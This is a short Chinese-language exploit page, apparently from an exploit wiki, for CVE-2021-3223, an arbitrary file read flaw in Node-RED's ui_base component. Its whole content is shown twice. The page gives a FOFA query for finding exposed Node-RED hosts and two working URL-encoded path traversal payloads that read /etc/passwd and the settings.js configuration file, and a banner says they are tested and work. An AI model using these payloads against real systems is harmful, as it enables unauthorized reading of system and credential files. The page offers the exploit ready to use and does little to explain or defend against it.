CVE-2021-3223_Node-RED_ui_base_任意文件讀取漏洞

# CVE-2021-3223 Node-RED ui base 任意文件讀取漏洞


{| style=”border: 2.0px solid grey; background: #b3ff9c;” width=”85%”
| align=”center” width=”60px”| ![](/static/pwnwiki/img/Check.png)
| align=”center” |”’該漏洞已通過驗證”’
——
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。
|}

==漏洞影響==
Node-RED

==FOFA==

title="Node-RED"

==POC==

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
==參考==
https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg


{| style=”border: 2.0px solid grey; background: #b3ff9c;” width=”85%”
| align=”center” width=”60px”| ![](/static/pwnwiki/img/Check.png)
| align=”center” |”’ 該漏洞已通過驗證”’
——
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。
|}

==漏洞影響==
Node-RED

==FOFA==

title="Node-RED"

==POC==

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
==參考==
https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容